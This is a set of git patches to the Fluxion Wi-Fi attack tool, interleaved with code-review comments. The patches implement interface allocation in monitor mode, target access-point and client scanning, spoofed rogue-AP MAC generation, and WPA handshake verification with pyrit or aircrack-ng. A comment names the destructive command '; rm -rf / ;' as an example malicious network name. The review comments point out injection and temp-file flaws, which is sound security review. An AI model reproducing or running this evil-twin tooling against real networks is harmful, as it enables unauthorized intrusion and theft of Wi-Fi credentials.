+ interfacesAvailableColor+=( \
+ "$CClr" \
+ "$CClr" \
+ )
+
+ format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n"
+ io_query_format_fields \
+ "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \
+ interfacesAvailableColor[@] interfacesAvailable[@] \
+ interfacesAvailableState[@] interfacesAvailableInfo[@]
+
+ echo
+
+ case "${IOQueryFormatFields[1]}" in
+ "$FLUXIONGeneralRepeatOption") return -2;;
+ "$FLUXIONGeneralBackOption") return -1;;
+ esac
+
+ FluxionGetInterfaceSelected="${IOQueryFormatFields[1]}"
+ FluxionGetInterfaceSelectedState="${IOQueryFormatFields[2]}"
+ FluxionGetInterfaceSelectedInfo="${IOQueryFormatFields[3]}"
+ fi
+}
+
+
+
+
+
+
+
+
+
+
+# ============================================================ #
+# ================= < Argument Executables > ================= #
+# ============================================================ #
+eval set -- "$FLUXIONCLIArguments" # Set environment parameters.
+
+while [ "$1" != "--" ]; do
+ case "$1" in
+ -t|--target) echo "Not yet implemented!"; sleep 3; fluxion_shutdown;;
+ esac
+ shift # Shift new parameters
+done
+
+shift # Remove "--" to prepare for attacks to read parameters.
+
+
+# ============================================================ #
+# ===================== < FLUXION Loop > ===================== #
+# ============================================================ #
+function fluxion_main() {
+ fluxion_startup
+
+ fluxion_set_resolution
+ fluxion_set_language
+
+ local -r sequence=("set_attack" "prep_attack" "run_attack")
+
+ while true # Fluxion's runtime-loop.
+ do fluxion_do_sequence fluxion sequence[@]
+ done
+
+ fluxion_shutdown
+}
+
+fluxion_main # Start Fluxion
+
+# FLUXSCRIPT END
diff --git a/language/en.sh b/language/en.sh
index 6f9ea4a..aa64840 100755
--- a/language/en.sh
+++ b/language/en.sh
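Review bot: The library includes in the new `fluxion` script (`source lib/installer/InstallerUtils.sh` through `source lib/HashUtils.sh`) resolve against the caller's current directory, although the script has just confirmed it runs as root and has already computed `FLUXIONPath`; started from any other directory it either fails or executes whatever `lib/*.sh` that directory happens to hold. Anchoring them the way the default-language include already is, e.g. `source "$FLUXIONPath/lib/InterfaceUtils.sh"`, and aborting when a source fails, removes that dependency. The same trust problem applies to `FLUXIONWorkspacePath="/tmp/fluxspace"`: `mkdir -p` also succeeds on a directory or symlink that another local user created first, `PackageManagerLog` is placed inside it, and `fluxion_shutdown` later passes `"$FLUXIONWorkspacePath/*"` to `sandbox_remove_workfile` as root. Creating the workspace with `mktemp -d` in the working-directory check (or at least refusing a pre-existing path that is not a root-owned, mode 0700 directory) would close that; whether subscripts rely on the fixed name is not visible here and should be checked first.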
@@ -3,22 +3,24 @@ # native: English FLUXIONInterfaceQuery="Select a wireless interface" +FLUXIONAllocatingInterfaceNotice="Starting interface reservation..." +FLUXIONReidentifyingInterface="Renaming interface..." FLUXIONUnblockingWINotice="Unblocking all wireless interfaces..." -FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." +#FLUXIONFindingExtraWINotice="Looking for extraneous wireless interfaces..." FLUXIONRemovingExtraWINotice="Removing extraneous wireless interfaces..." FLUXIONFindingWINotice="Looking for available wireless interfaces..." FLUXIONSelectedBusyWIError="The wireless interface selected appears to be currently in use!" -FLUXIONSelectedBusyWITip="Run \"export FLUXIONWIKillProcesses=1\" before FLUXION to use it." +FLUXIONSelectedBusyWITip="This is usually caused by the network manager using the interface selected. We recommened you$CGrn gracefully stop the network manager$CClr or configure it to ignored the selected interface. Alternatively, run \"export FLUXIONWIKillProcesses=1\" before fluxion to kill it but we suggest you$CRed avoid using the killer flag${CClr}." FLUXIONGatheringWIInfoNotice="Gathering interface information..." FLUXIONUnknownWIDriverError="Unable to determine interface driver!" -FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to unload..." -FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$wiSelected\" to load..." +FLUXIONUnloadingWIDriverNotice="Waiting for interface \"\$interface\" to unload..." +FLUXIONLoadingWIDriverNotice="Waiting for interface \"\$interface\" to load..." FLUXIONFindingConflictingProcessesNotice="Looking for notorious services..." FLUXIONKillingConflictingProcessesNotice="Killing notorious services..." FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's physical device!" FLUXIONStartingWIMonitorNotice="Starting monitor interface..." -FLUXIONMonitorModeWIEnabledNotice="${CGrn}Interface monitor mode enabled." 
-FLUXIONMonitorModeWIFailedError="${CRed}Interface monitor mode failed!" +FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" +FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." diff --git a/lib/InterfaceUtils.sh b/lib/InterfaceUtils.sh index 75a8ed9..ab7b2a6 100755 --- a/lib/InterfaceUtils.sh +++ b/lib/InterfaceUtils.sh @@ -11,22 +11,20 @@ if [ -d /sys/bus/usb ] # && hash lsusb; then InterfaceUSBBus=1 fi -if [ -d /sys/bus/pci ] || [ -d /sys/bus/pci_express ] || [ -d /proc/bus/pci ] # && hash lspci; +if [ -d /sys/bus/pci -o -d /sys/bus/pci_express -o -d /proc/bus/pci ] # && hash lspci; then InterfacePCIBus=1 fi # Checks if the interface belongs to a physical device. function interface_is_real() { - if [ -d /sys/class/net/$1/device ]; then return 0 - else return 1 - fi + test -d /sys/class/net/$1/device + return $? } # Checks if the interface belongs to a wireless device. function interface_is_wireless() { - if grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent; then return 0 - else return 1 - fi + grep -qs "DEVTYPE=wlan" /sys/class/net/$1/uevent + return $? } # Returns an array of absolutely all interfaces. 
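Review bot: `$1` is expanded unquoted in `test -d /sys/class/net/$1/device` and in the `grep` on `/sys/class/net/$1/uevent`, so a name containing whitespace or glob characters is split into several arguments, and the `grep` then reads an extra path relative to the current directory. Quote the paths, e.g. `test -d "/sys/class/net/$1/device"` and `grep -qs "DEVTYPE=wlan" "/sys/class/net/$1/uevent"`; the trailing `return $?` is redundant because a function already returns its last command's status. The bus check in the same hunk also moves to `-o` inside a single `[ ]`, which POSIX marks obsolescent, and the previous `[ ... ] || [ ... ]` form was the more robust one.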
@@ -146,16 +144,41 @@ function interface_state() { function interface_set_state() { if [ "${#@}" -ne 2 ]; then return 1; fi + # TODO: Add alternatives to 'ip' in case of failure. ip link set "$1" "$2" + return $? } function interface_set_mode() { if [ "${#@}" -ne 2 ]; then return 1; fi if ! interface_set_state "$1" "down"; then return 2; fi - if ! iwconfig "$1" mode "$2" &>$InterfaceUtilsOutputDevice; then return 3; fi + if ! iw dev "$1" set type "$2" &> $InterfaceUtilsOutputDevice; then + if ! iwconfig "$1" mode "$2" &> $InterfaceUtilsOutputDevice + then return 3 + fi + fi if ! interface_set_state "$1" "up"; then return 4; fi } +function interface_reidentify() { + if [ ${#@} -ne 2 ]; then return 1; fi + + local -r __interface_reidentify__oldIdentifier=$1 + local -r __interface_reidentify__newIdentifier=$2 + + if [[ $__interface_reidentify__newIdentifier == *" "* ]] + then return 2 + fi + + if ! interface_set_state $__interface_reidentify__oldIdentifier down + then return 3 + fi + + # TODO: Add alternatives to 'ip' in case of failure. + ip link set $__interface_reidentify__oldIdentifier name $__interface_reidentify__newIdentifier + return $? +} + function interface_prompt() { if [ -z "$1" -o -z "$2" ]; then return 1; fi From 7987e28b56613f7d737a070eefeec08997c64e07 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Fri, 5 Jan 2018 23:57:16 -0600 Subject: [PATCH 02/45] Refactored & implemented targetting subroutines. The majority of the algorithms are enhanced migrations from fluxion 3. These new subroutines are modular and stand independent from the script. --- fluxion | 193 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 193 insertions(+) diff --git a/fluxion b/fluxion index cd71421..d25116c 100755 --- a/fluxion +++ b/fluxion 
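Review bot: `interface_reidentify` rejects only a literal space in the new name and then passes both identifiers unquoted to `interface_set_state` and to `ip link set ... name ...`, so a tab, a glob character or an empty second argument still reaches a root-run `ip` command as extra or missing words. Validate against an allow-list and quote the expansions, e.g. `[[ $2 =~ ^[A-Za-z0-9_.-]{1,15}$ ]] || return 2` followed by `ip link set "$__interface_reidentify__oldIdentifier" name "$__interface_reidentify__newIdentifier"`; the 15-character bound is the Linux interface-name limit. The same quoting applies to `&> $InterfaceUtilsOutputDevice` in `interface_set_mode`. The function also leaves the interface down after a successful rename, which may be intended but deserves a comment; `interface_prompt` after it continues outside the hunk.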
@@ -811,8 +811,201 @@ function fluxion_get_interface() { } +# ============== < Fluxion Target Subroutines > ============== # +# Parameters: interface [ channel(s) [ band(s) ] ] +# ------------------------------------------------------------ # +# Return 1: Missing monitor interface. +# Return 2: Xterm failed to start airmon-ng. +# Return 3: Invalid capture file was generated. +# Return 4: No candidates were detected. +function fluxion_get_target_candidates() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi + + echo -e "$FLUXIONVLine $FLUXIONStartingScannerNotice" + echo -e "$FLUXIONVLine $FLUXIONStartingScannerTip" + + # Assure all previous scan results have been cleared. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + #if [ "$FLUXIONAuto" ]; then + # sleep 30 && killall xterm & + #fi + + # Begin scanner and output all results to "dump-01.csv." + if ! xterm -title "$FLUXIONScannerHeader" $TOPLEFTBIG -bg "#000000" -fg "#FFFFFF" -e "airodump-ng -Mat WPA "${2:+"--channel $2"}" "${3:+"--band $3"}" -w \"$FLUXIONWorkspacePath/dump\" $1" 2> $FLUXIONOutputDevice; then + echo -e "$FLUXIONVLine$CRed $FLUXIONGeneralXTermFailureError" + sleep 5 + return 2 + fi + + # Sanity check the capture files generated by the scanner. + # If the file doesn't exist, or if it's empty, abort immediately. + if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ + ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + return 3 + fi + + # Syntheize scan operation results from output file "dump-01.csv." + echo -e "$FLUXIONVLine $FLUXIONPreparingScannerResultsNotice" + # WARNING: The code below may break with different version of airmon-ng. + # The times matching operator "{n}" isn't supported by mawk (alias awk). 
+ # readarray FLUXIONTargetCandidates < <(gawk -F, 'NF==15 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) + # readarray FLUXIONTargetCandidatesClients < <(gawk -F, 'NF==7 && $1~/([A-F0-9]{2}:){5}[A-F0-9]{2}/ {print $0}' $FLUXIONWorkspacePath/dump-01.csv) + readarray FLUXIONTargetCandidates < <(awk -F, 'NF==15 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + readarray FLUXIONTargetCandidatesClients < <(awk -F, 'NF==7 && length($1)==17 && $1~/([A-F0-9][A-F0-9]:)+[A-F0-9][A-F0-9]/ {print $0}' "$FLUXIONWorkspacePath/dump-01.csv") + + # Cleanup the workspace to prevent potential bugs/conflicts. + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + + if [ ${#FLUXIONTargetCandidates[@]} -eq 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONScannerDetectedNothingNotice" + sleep 3 + return 4 + fi +} +function fluxion_get_target() { + # Assure a valid wireless interface for scanning was given. + if [ ! "$1" ] || ! 
interface_is_wireless "$1"; then return 1; fi + + local choices=( \ + "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ + "$FLUXIONScannerChannelOptionAll (5GHz)" \ + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ + "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" + ) + + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONScannerChannelOptionAll (2.4GHz)") + fluxion_get_target_candidates $interface "" "bg";; + + "$FLUXIONScannerChannelOptionAll (5GHz)") + fluxion_get_target_candidates $interface "" "a";; + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + fluxion_get_target_candidates $interface "" "abg";; + + "$FLUXIONScannerChannelOptionSpecific") + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONScannerChannelQuery" + echo + echo -e " $FLUXIONScannerChannelSingleTip ${CBlu}6$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1-5$CClr " + echo -e " $FLUXIONScannerChannelMiltipleTip ${CBlu}1,2,5-7,11$CClr " + echo + echo -ne "$FLUXIONPrompt" + + local channels + read channels + + echo + + fluxion_get_target_candidates $interface $channels;; + + "$FLUXIONGeneralBackOption") + return -1;; + esac + + # Abort if errors occured while searching for candidates. + if [ $? -ne 0 ]; then return 2; fi + + local candidatesMAC=() + local candidatesClientsCount=() + local candidatesChannel=() + local candidatesSecurity=() + local candidatesSignal=() + local candidatesPower=() + local candidatesESSID=() + local candidatesColor=() + + # Gather information from all the candidates detected. + # TODO: Clean up this for loop using a cleaner algorithm. + # Maybe try using array appending & [-1] for last elements. + for candidateAPInfo in "${candidates[@]}"; do + # Strip candidate info from any extraneous spaces after commas. 
+ candidateAPInfo=$(echo "$candidateAPInfo" | sed -r "s/,\s*/,/g") + + local i=${#candidatesMAC[@]} + + candidatesMAC[i]=$(echo "$candidateAPInfo" | cut -d , -f 1) + candidatesClientsCount[i]=$(echo "${candidatesClients[@]}" | grep -c "${candidatesMAC[i]}") + candidatesChannel[i]=$(echo "$candidateAPInfo" | cut -d , -f 4) + candidatesSecurity[i]=$(echo "$candidateAPInfo" | cut -d , -f 6) + candidatesPower[i]=$(echo "$candidateAPInfo" | cut -d , -f 9) + candidatesColor[i]=$([ ${candidatesClientsCount[i]} -gt 0 ] && echo $CGrn || echo $CClr) + + # Parse any non-ascii characters by letting bash handle them. + # Just escape all single quotes in ESSID and let bash's $'...' handle it. + local sanitizedESSID=$(echo "${candidateAPInfo//\'/\\\'}" | cut -d , -f 14) + candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'") + + local power=${candidatesPower[i]} + if [ $power -eq -1 ]; then + # airodump-ng's man page says -1 means unsupported value. + candidatesQuality[i]="??" + elif [ $power -le $FLUXIONNoiseFloor ]; then + candidatesQuality[i]=0 + elif [ $power -gt $FLUXIONNoiseCeiling ]; then + candidatesQuality[i]=100 + else + # Bash doesn't support floating point division, so I gotta work around it... + # The function is Q = ((P - F) / (C - F)); Q - quality, P - power, F - floor, C - Ceiling. 
+ candidatesQuality[i]=$(((${candidatesPower[i]} * 10 - $FLUXIONNoiseFloor * 10) / (($FLUXIONNoiseCeiling - $FLUXIONNoiseFloor) / 10))) + fi + done + + format_center_literals "WIFI LIST" + local -r headerTitle="$FormatCenterLiterals\n\n" + + format_apply_autosize "$CRed[$CSYel ** $CClr$CRed]$CClr %-*.*s %4s %3s %3s %2s %-8.8s %18s\n" + local -r headerFields=$(printf "$FormatApplyAutosize" "ESSID" "QLTY" "PWR" "STA" "CH" "SECURITY" "BSSID") + + format_apply_autosize "$CRed[$CSYel%03d$CClr$CRed]%b %-*.*s %3s%% %3s %3d %2s %-8.8s %18s\n" + io_query_format_fields "$headerTitle$headerFields" "$FormatApplyAutosize" \ + candidatesColor[@] \ + candidatesESSID[@] \ + candidatesQuality[@] \ + candidatesPower[@] \ + candidatesClientsCount[@] \ + candidatesChannel[@] \ + candidatesSecurity[@] \ + candidatesMAC[@] + + echo + + FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} + FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} + FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} + + FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} + + FLUXIONGetTargetMakerID=${APTargetMAC:0:8} + FLUXIONGetTargetMaker=$( + macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- + ) + + # Sanitize network ESSID to make it safe for manipulation. + # Notice: Why remove these? Some smartass might decide to name their + # network "; rm -rf / ;". If the string isn't sanitized accidentally + # shit'll hit the fan and we'll have an extremly distressed user. + # Replacing ' ', '/', '.', '~', '\' with '_' + FLUXIONGetTargetSSIDClean=$( + echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + ) + + # We'll change a single hex digit from the target AP's MAC address. + # This new MAC address will be used as the rogue AP's MAC address. + local -r rogueMACHex=$(printf %02X $((0x${APTargetMAC:13:1} + 1))) + FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" +} From 1613eec221ec2b5f9324c0c35367f8f550172f38 Mon Sep 17 00:00:00 2001 
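Review bot: In `fluxion_get_target`, `candidatesESSID[i]=$(eval "echo \$'$sanitizedESSID'")` evaluates a network name read from the scan CSV, which is whatever nearby devices broadcast, in a script that refuses to start unless it runs as root. Escaping single quotes beforehand is not a safe boundary for `eval`, and the "Sanitize network ESSID" step further down runs only after this line. Decode the escapes without `eval`, for example `printf -v "candidatesESSID[$i]" '%b' "$(cut -d , -f 14 <<< "$candidateAPInfo")"`, and confirm that `%b` covers the escape forms the scanner writes. Separately, the loop reads `candidates` and `candidatesClients`, which this hunk never assigns (the scan fills `FLUXIONTargetCandidates` and `FLUXIONTargetCandidatesClients`), so the list appears to stay empty.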
From: Matias Barcenas Date: Sat, 6 Jan 2018 22:21:37 -0600 Subject: [PATCH 03/45] Hash subroutines, attack subroutines, & bug fixes. Implemented modular hash and attack subroutines. Fixed minor bugs with script startup. --- fluxion | 388 ++++++++++++++++++++++++++++++++++++++++------- lib/HashUtils.sh | 85 ++++++----- 2 files changed, 375 insertions(+), 98 deletions(-) diff --git a/fluxion b/fluxion index d25116c..5efebbe 100755 --- a/fluxion +++ b/fluxion @@ -90,7 +90,7 @@ declare -r FLUXIONCLIArguments=$FLUXIONCLIArguments # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +[ "$1" != "--" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "--" ]; do case "$1" in @@ -275,7 +275,7 @@ function fluxion_shutdown() { # If allocated interfaces exist, deallocate them now. if [ ${#FluxionInterfaces[@]} -gt 0 ]; then echo -e "$FLUXIONVLine $FLUXIONRemovingExtraWINotice" - + local interface for interface in "${!FluxionInterfaces[@]}"; do # Only deallocate fluxion or airmon-ng created interfaces. @@ -343,7 +343,7 @@ if [ $FLUXIONDebug ] function fluxion_error_report() { echo "Exception caught @ line #$1" } - + then trap 'fluxion_error_report $LINENO' ERR fi 
@@ -473,38 +473,40 @@ function fluxion_done_reset() { function fluxion_do_sequence() { if [ ${#@} -ne 2 ]; then return -1; fi - # TODO: Implement an alternative, better method of doing + # TODO: Implement an alternative, better method of doing # what this subroutine does, maybe using for-loop iteration. # The for-loop implementation must support the subroutines # defined above, including updating the namespace tracker. - local -r namespace=$1 - local -r sequence=("${!2}") + local -r __fluxion_do_sequence__namespace=$1 + local -r __fluxion_do_sequence__sequence=("${!2}") - if [ ${#sequence[@]} -eq 0 ]; then return -2; fi + if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then + return -2 + fi + + local -A __fluxion_do_sequence__index=() - local -A index=() - local i - for i in $(seq ${#sequence[@]}); do - index["${sequence[i-1]}"]=$i + for i in $(seq ${#__fluxion_do_sequence__sequence[@]}); do + __fluxion_do_sequence__index["${__fluxion_do_sequence__sequence[i-1]}"]=$i done - - local instruction=${sequence[0]} - while [ "$instruction" ]; do - if ! fluxion_do $namespace $instruction; then - if ! fluxion_undo $namespace + + local __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[0]} + while [ "$__fluxion_do_sequence__instruction" ]; do + if ! fluxion_do $__fluxion_do_sequence__namespace $__fluxion_do_sequence__instruction; then + if ! fluxion_undo $__fluxion_do_sequence__namespace then break fi fi - + if ! fluxion_done; then return -3; fi - - local instructionIndex=${index["$FluxionDone"]} - - if [ ! "$instructionIndex" ]; then return -4; fi - - instruction=${sequence["$instructionIndex"]} + + local __fluxion_do_sequence__instructionIndex=${__fluxion_do_sequence__index["$FluxionDone"]} + + if [ ! "$__fluxion_do_sequence__instructionIndex" ]; then return -4; fi + + __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence["$__fluxion_do_sequence__instructionIndex"]} done } 
@@ -577,10 +579,10 @@ declare -A FluxionInterfaces=() # Global interfaces' registry. function fluxion_deallocate_interface() { # Release interfaces if [ ! "$1" ] || ! interface_is_real $1; then return 1; fi - + local -r oldIdentifier=$1 local -r newIdentifier=${FluxionInterfaces[$oldIdentifier]} - + # Assure the interface is in the allocation table. if [ ! "$newIdentifier" ]; then return 2; fi @@ -588,13 +590,13 @@ function fluxion_deallocate_interface() { # Release interfaces # Unblock interfaces to make them available. echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" rfkill unblock all &> $FLUXIONOutputDevice - + # Attempt deactivating monitor mode on the interface. if interface_set_mode $oldIdentifier managed then return 3 fi fi - + # If interface was allocated by airmon-ng, deallocate with it. if [[ "$oldIdentifier" == *"mon"* ]]; then if ! airmon-ng stop $oldIdentifier &> $FLUXIONOutputDevice @@ -622,14 +624,14 @@ function fluxion_allocate_interface() { # Reserve interfaces FluxionInterface=${FluxionInterfaces[$identifier]} return 0 fi - + echo -e "$FLUXIONVLine $FLUXIONAllocatingInterfaceNotice" - - if interface_is_wireless $identifier; then + + if interface_is_wireless $identifier; then # Unblock wireless interfaces to make them available. echo -e "$FLUXIONVLine $FLUXIONUnblockingWINotice" rfkill unblock all &> $FLUXIONOutputDevice - + if [ "$FLUXIONWIReloadDriver" ]; then # Get selected interface's driver details/info-descriptor. echo -e "$FLUXIONVLine $FLUXIONGatheringWIInfoNotice" 
@@ -656,10 +658,10 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ "$FLUXIONWIKillProcesses" ]; then # Get list of potentially troublesome programs. echo -e "$FLUXIONVLine $FLUXIONFindingConflictingProcessesNotice" - + # Kill potentially troublesome programs. echo -e "$FLUXIONVLine $FLUXIONKillingConflictingProcessesNotice" - + # TODO: Make the loop below airmon-ng independent. # Maybe replace it with a list of network-managers? # WARNING: Version differences could break code below. @@ -678,7 +680,7 @@ function fluxion_allocate_interface() { # Reserve interfaces do sleep 1 done fi - + # Set wireless flag to prevent having to re-query. local -r allocatingWirelessInterface=1 fi @@ -687,13 +689,13 @@ function fluxion_allocate_interface() { # Reserve interfaces # If usuing airmon-ng, let airmon-ng rename the interface. if [ ! $FLUXIONAirmonNG ]; then echo -e "$FLUXIONVLine $FLUXIONReidentifyingInterface" - + if [ $allocatingWirelessInterface ] # Prevent interface-snatching by renaming the interface. then interface_reidentify $identifier fluxwl${#FluxionInterfaces[@]} else interface_reidentify $identifier fluxet${#FluxionInterfaces[@]} fi - + if [ $? -ne 0 ] # If reidentifying failed, abort immediately. then return 3 fi 
@@ -702,13 +704,13 @@ function fluxion_allocate_interface() { # Reserve interfaces if [ $allocatingWirelessInterface ]; then # Activate wireless interface monitor mode and save identifier. echo -e "$FLUXIONVLine $FLUXIONStartingWIMonitorNotice" - + # TODO: Consider the airmon-ng flag is set, monitor mode is # already enabled on the interface being allocated, and the # interface identifier is something non-airmon-ng standard. # The interface could already be in use by something else. # Snatching or crashing interface issues could occur. - + # NOTICE: Conditionals below populate newIdentifier on success. if [ $FLUXIONAirmonNG ]; then local -r newIdentifier=$(airmon-ng start $identifier | grep "monitor .* enabled" | grep -oP "wl.*mon|mon[0-9]+") @@ -731,15 +733,15 @@ function fluxion_allocate_interface() { # Reserve interfaces sleep 3 return 4 fi - + # Register identifiers to allocation hash table. FluxionInterfaces[$newIdentifier]=$identifier FluxionInterfaces[$identifier]=$newIdentifier - + echo -e "$FLUXIONVLine $FLUXIONInterfaceAllocatedNotice" sleep 3 - - # Notice: Interfaces are accessed with their original identifier + + # Notice: Interfaces are accessed with their original identifier # as the key for the global FluxionInterfaces hash/map/dictionary. } @@ -785,12 +787,12 @@ function fluxion_get_interface() { "$FLUXIONGeneralRepeatOption" \ "$FLUXIONGeneralBackOption" \ ) - + interfacesAvailableColor+=( \ "$CClr" \ "$CClr" \ ) - + format_apply_autosize "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" io_query_format_fields \ "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ @@ -843,7 +845,7 @@ function fluxion_get_target_candidates() { # If the file doesn't exist, or if it's empty, abort immediately. if [ ! -f "$FLUXIONWorkspacePath/dump-01.csv" -o \ ! -s "$FLUXIONWorkspacePath/dump-01.csv" ]; then - sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" + sandbox_remove_workfile "$FLUXIONWorkspacePath/dump*" return 3 fi 
@@ -870,14 +872,14 @@ function fluxion_get_target_candidates() { function fluxion_get_target() { # Assure a valid wireless interface for scanning was given. if [ ! "$1" ] || ! interface_is_wireless "$1"; then return 1; fi - + local choices=( \ "$FLUXIONScannerChannelOptionAll (2.4GHz)" \ "$FLUXIONScannerChannelOptionAll (5GHz)" \ "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)" \ "$FLUXIONScannerChannelOptionSpecific" "$FLUXIONGeneralBackOption" ) - + io_query_choice "$FLUXIONScannerChannelQuery" choices[@] echo @@ -885,13 +887,13 @@ function fluxion_get_target() { case "$IOQueryChoice" in "$FLUXIONScannerChannelOptionAll (2.4GHz)") fluxion_get_target_candidates $interface "" "bg";; - - "$FLUXIONScannerChannelOptionAll (5GHz)") + + "$FLUXIONScannerChannelOptionAll (5GHz)") fluxion_get_target_candidates $interface "" "a";; - - "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") + + "$FLUXIONScannerChannelOptionAll (2.4GHz & 5Ghz)") fluxion_get_target_candidates $interface "" "abg";; - + "$FLUXIONScannerChannelOptionSpecific") fluxion_header @@ -909,14 +911,14 @@ function fluxion_get_target() { echo fluxion_get_target_candidates $interface $channels;; - + "$FLUXIONGeneralBackOption") return -1;; esac - + # Abort if errors occured while searching for candidates. if [ $? -ne 0 ]; then return 2; fi - + local candidatesMAC=() local candidatesClientsCount=() local candidatesChannel=() @@ -984,14 +986,14 @@ function fluxion_get_target() { FLUXIONGetTargetMAC=${IOQueryFormatFields[7]} FLUXIONGetTargetSSID=${IOQueryFormatFields[1]} FLUXIONGetTargetChannel=${IOQueryFormatFields[5]} - + FLUXIONGetTargetEncryption=${IOQueryFormatFields[6]} FLUXIONGetTargetMakerID=${APTargetMAC:0:8} FLUXIONGetTargetMaker=$( macchanger -l | grep ${FLUXIONGetTargetMakerID,,} | cut -d ' ' -f 5- ) - + # Sanitize network ESSID to make it safe for manipulation. # Notice: Why remove these? Some smartass might decide to name their # network "; rm -rf / ;". If the string isn't sanitized accidentally 
@@ -1007,9 +1009,279 @@ function fluxion_get_target() { FLUXIONGetTargetRogueMAC="${FLUXIONGetTargetMAC::13}${rogueMACHex:1:1}${FLUXIONGetTargetRogueMAC:14:4}" } +function fluxion_target_show() { + format_apply_autosize "%*s$CBlu%7s$CClr: %-32s%*s\n" + + local colorlessFormat="$FormatApplyAutosize" + local colorfullFormat=$(echo "$colorlessFormat" | sed -r 's/%-32s/%-32b/g') + + printf "$colorlessFormat" "" "ESSID" "\"${FLUXIONGetTargetSSID:-[N/A]}\" / ${FLUXIONGetTargetEncryption:-[N/A]}" "" + printf "$colorlessFormat" "" "Channel" "${FLUXIONGetTargetChannel:-[N/A]}" "" + printf "$colorfullFormat" "" "BSSID" "${FLUXIONGetTargetMAC:-[N/A]} ($CYel${FLUXIONGetTargetMaker:-[N/A]}$CClr)" "" + + echo +} +# =================== < Hash Subroutines > =================== # +# Parameters: [channel [encryption [maker]]] +function fluxion_hash_verify() { + if [ ${#@} -lt 3 ]; then return 1; fi + local -r hashPath=$1 + local -r hashBSSID=$2 + local -r hashESSID=$3 + local -r hashChannel=$4 + local -r hashEncryption=$5 + local -r hashMaker=$6 + + if [ ! -f "$hashPath" -o ! 
-s "$hashPath" ]; then + echo -e "$FLUXIONVLine $FLUXIONHashFileDoesNotExistError" + sleep 3 + return 2 + fi + + if [ "$FLUXIONAuto" ]; then + local -r verifier="pyrit" + else + fluxion_header + + echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" + echo + + fluxion_show_ap_info + "$hashESSID" \ + "$hashEncryption" \ + "$hashChannel" \ + "$hashBSSID" \ + "$hashMaker" + + local choices=( \ + "$FLUXIONHashVerificationMethodPyritOption" \ + "$FLUXIONHashVerificationMethodAircrackOption" \ + "$FLUXIONGeneralBackOption" \ + ) + + io_query_choice "" choices[@] + + echo + + case "$IOQueryChoice" in + "$FLUXIONHashVerificationMethodPyritOption") + local -r verifier="pyrit" ;; + + "$FLUXIONHashVerificationMethodAircrackOption") + local -r verifier="aircrack-ng" ;; + + "$FLUXIONGeneralBackOption") + return -1 ;; + esac + fi + + hash_check_handshake \ + "$verifier" \ + "$hashPath" \ + "$APTargetSSID" \ + "$APTargetMAC" + + local -r hashResult=$? + + # A value other than 0 means there's an issue with the hash. + if [ $hashResult -ne 0 ]; then + echo -e "$FLUXIONVLine $FLUXIONHashInvalidError" + else + echo -e "$FLUXIONVLine $FLUXIONHashValidNotice" + fi + + sleep 3 + + if [ $hashResult -ne 0 ]; then return 1; fi +} + +function 